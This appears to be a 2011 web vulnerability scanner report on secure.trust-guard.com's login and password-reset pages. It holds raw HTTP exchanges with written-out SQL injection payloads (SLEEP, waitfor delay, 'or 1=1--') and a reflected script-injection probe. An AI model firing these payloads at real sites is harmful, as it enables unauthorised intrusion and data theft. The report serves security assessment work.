1.1. https://secure.trust-guard.com/ [__utmb cookie]
1.2. https://secure.trust-guard.com/ [__utmc cookie]
1.3. https://secure.trust-guard.com/ResetPassword.php [txtEmail parameter]
1.4. https://secure.trust-guard.com/index.php [__utma cookie]
1.5. https://secure.trust-guard.com/index.php [__utmz cookie]
2.1. https://secure.trust-guard.com/ [__utmb cookie]
2.2. https://secure.trust-guard.com/ [name of an arbitrarily supplied request parameter]
2.3. https://secure.trust-guard.com/ResetPassword.php [Referer HTTP header]
2.4. https://secure.trust-guard.com/ResetPassword.php [User-Agent HTTP header]
2.6. https://secure.trust-guard.com/ResetPassword.php [txtEmail parameter]
2.7. https://secure.trust-guard.com/index.php [__utmb cookie]
2.8. https://secure.trust-guard.com/index.php [__utmz cookie]
2.9. https://secure.trust-guard.com/index.php [name of an arbitrarily supplied request parameter]
3. Cross-site scripting (reflected)
4. SQL statement in request parameter
4.1. https://secure.trust-guard.com/ResetPassword.php
4.2. https://secure.trust-guard.com/index.php
5. SSL cookie without secure flag set
5.1. https://secure.trust-guard.com/
5.2. https://secure.trust-guard.com/ResetPassword.php
5.3. https://secure.trust-guard.com/index.php
6. Cookie without HttpOnly flag set
6.1. https://secure.trust-guard.com/
6.2. https://secure.trust-guard.com/ResetPassword.php
6.3. https://secure.trust-guard.com/index.php
7. Password field with autocomplete enabled
7.1. https://secure.trust-guard.com/
7.2. https://secure.trust-guard.com/index.php
8.1. https://secure.trust-guard.com/ResetPassword.php
8.2. https://secure.trust-guard.com/index.php
Severity: | High |
Confidence: | Firm |
Host: | https://secure.trust |
Path: | / |
GET / HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:03:29 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | https://secure.trust |
Path: | / |
GET / HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:56:06 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | https://secure.trust |
Path: | /ResetPassword.php |
POST /ResetPassword.php HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive Referer: https://secure.trust Cache-Control: max-age=0 Origin: https://secure.trust User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 Content-Length: 66 txtEmail=-111%27+OR+SLEEP |
HTTP/1.1 302 Found Date: Sat, 07 May 2011 01:20:55 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 200 Location: index.php P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 |
Severity: | High |
Confidence: | Firm |
Host: | https://secure.trust |
Path: | /index.php |
GET /index.php HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive Referer: https://secure.trust Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:30:13 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | https://secure.trust |
Path: | /index.php |
GET /index.php HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive Referer: https://secure.trust Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:12:23 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | / |
GET / HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:59:34 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5139 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | / |
GET /?1,0,0,0)waitfor%20delay'0 Host: secure.trust-guard.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:16:12 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | /ResetPassword.php |
GET /ResetPassword.php HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:37:04 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 3716 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | /ResetPassword.php |
GET /ResetPassword.php HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive Referer: https://secure.trust User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24')waitfor%20delay'0%3a0 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:31:04 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 3716 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | /ResetPassword.php |
GET /ResetPassword.php?1',0)waitfor%20delay'0%3a0 Host: secure.trust-guard.com Connection: keep-alive Referer: https://secure.trust User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:11:07 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 3716 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | https://secure.trust |
Path: | /ResetPassword.php |
POST /ResetPassword.php HTTP/1.1 Referer: https://secure.trust User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form Host: secure.trust-guard.com Cookie: PHPSESSID=uh9nm4eto5 Accept-Encoding: gzip, deflate Connection: Keep-Alive Content-Length: 43 txtEmail=19587081'%20or%201%3d1-- |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:59:13 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... <title>Trust Guard Login</title> <script type="text/javascript"> //<![CDATA[ document.getElements //]]> function TemplateOnUnload() { } </script> </head> <body style="background-color: <div style="text-align: center"> <center> <table style="width: 1020px; background-color: white;" border="1" bordercolor="#000000" cellpadding="0" cellspacing="0"> <tr> <td style="background-image </td> </tr> <tr> <td align="center" style="vertical-align: middle; height: 23px;"></td> </tr> <tr> <td> <br /> <center> <div style="border-right: #000000 thin solid; border-top: #000000 thin solid; border-left: #000000 thin solid; width:300px; border-bottom: #000000 thin solid; background-color: #eeeeee; padding-right: 15px; padding-left: 15px; padding-bottom: 15px; padding-top: 15px; text-align: left;"> <form id="content:content" method="post" style="margin:0px" action="index.php"> <br /><br /> <script type="text/javascript"> function validateForm() { var message; var nouser = (!validatePresent var nopass = (!validatePresent if (nouser && nopass) message = 'Please enter a username and a password.'; else if (nouser) message = 'Please enter a username.'; else if (nopass) message = 'Please enter a password.'; ...[SNIP]... |
POST /ResetPassword.php HTTP/1.1 Referer: https://secure.trust User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form Host: secure.trust-guard.com Cookie: PHPSESSID=uh9nm4eto5 Accept-Encoding: gzip, deflate Connection: Keep-Alive Content-Length: 43 txtEmail=19587081'%20or%201%3d2-- |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:59:14 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 3795 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... <title>Reset Password</title> <script type="text/javascript"> //<![CDATA[ document.getElements //]]> function TemplateOnUnload() { } </script> </head> <body style="background-color: <div style="text-align: center"> <center> <table style="width: 1020px; background-color: white;" border="1" bordercolor="#000000" cellpadding="0" cellspacing="0"> <tr> <td style="background-image </td> </tr> <tr> <td align="center" style="vertical-align: middle; height: 23px;"></td> </tr> <tr> <td> <br /> <center> <div style="border-right: #000000 thin solid; border-top: #000000 thin solid; border-left: #000000 thin solid; width:300px; border-bottom: #000000 thin solid; background-color: #eeeeee; padding-right: 15px; padding-left: 15px; padding-bottom: 15px; padding-top: 15px; text-align: left;"> <form method="post" style="margin:0px"> Enter you email address or site name below and click Submit and we will send you a new password<br /> <input id="txtEmail" name="txtEmail" type="text" value="19587081' or 1=2-- " style="width:300px" onblur="validatePresent <div id="msg_email"> < <span style="color:Red"> <span id='lblResult' >Could not find an account will the site 19587081' or 1=2-- .</span> </span> <br /> <input id='btnSubmit' name='btnSubmit' type="submit" value="Submit" onclick="return validatePresent(document ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | /index.php |
GET /index.php HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive Referer: https://secure.trust Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 02:13:09 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5139 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | /index.php |
GET /index.php HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive Referer: https://secure.trust Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:06:53 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | /index.php |
GET /index.php/1'waitfor%20delay'0%3a0 Host: secure.trust-guard.com Connection: keep-alive Referer: https://secure.trust Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:55:15 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | /index.php |
POST /index.php HTTP/1.1 Referer: https://secure.trust User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form Host: secure.trust-guard.com Cookie: PHPSESSID=todvqp9ae2 Accept-Encoding: gzip, deflate Content-Length: 38 btnLogin=Submit&txtEmail=16a1d<script>alert(1)< |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:57:38 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5133 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... <span id='lblResult' style='color:red; ' >We could not find the account 16a1d<script>alert(1)< ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://secure.trust |
Path: | /ResetPassword.php |
POST /ResetPassword.php HTTP/1.1 Referer: https://secure.trust User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form Host: secure.trust-guard.com Cookie: PHPSESSID=slhdu6ps00 Accept-Encoding: gzip, deflate Content-Length: 119 btnCancel=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:30:50 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 3810 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://secure.trust |
Path: | /index.php |
POST /index.php HTTP/1.1 Referer: https://secure.trust User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form Host: secure.trust-guard.com Cookie: PHPSESSID=todvqp9ae2 Accept-Encoding: gzip, deflate Content-Length: 115 btnLogin=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:52:36 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5083 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://secure.trust |
Path: | / |
GET / HTTP/1.1 Referer: https://secure.trust User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: secure.trust-guard.com Accept-Encoding: gzip, deflate |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:58:13 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: PHPSESSID=a0np6gkb2v Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://secure.trust |
Path: | /ResetPassword.php |
GET /ResetPassword.php HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:01:18 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: PHPSESSID=523ir1s45t Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 3716 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://secure.trust |
Path: | /index.php |
GET /index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: secure.trust-guard.com Accept-Encoding: gzip, deflate |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:54:04 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: PHPSESSID=uh9nm4eto5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | https://secure.trust |
Path: | / |
GET / HTTP/1.1 Referer: https://secure.trust User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: secure.trust-guard.com Accept-Encoding: gzip, deflate |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:58:13 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: PHPSESSID=a0np6gkb2v Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | https://secure.trust |
Path: | /ResetPassword.php |
GET /ResetPassword.php HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:01:18 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: PHPSESSID=523ir1s45t Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 3716 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | https://secure.trust |
Path: | /index.php |
GET /index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: secure.trust-guard.com Accept-Encoding: gzip, deflate |
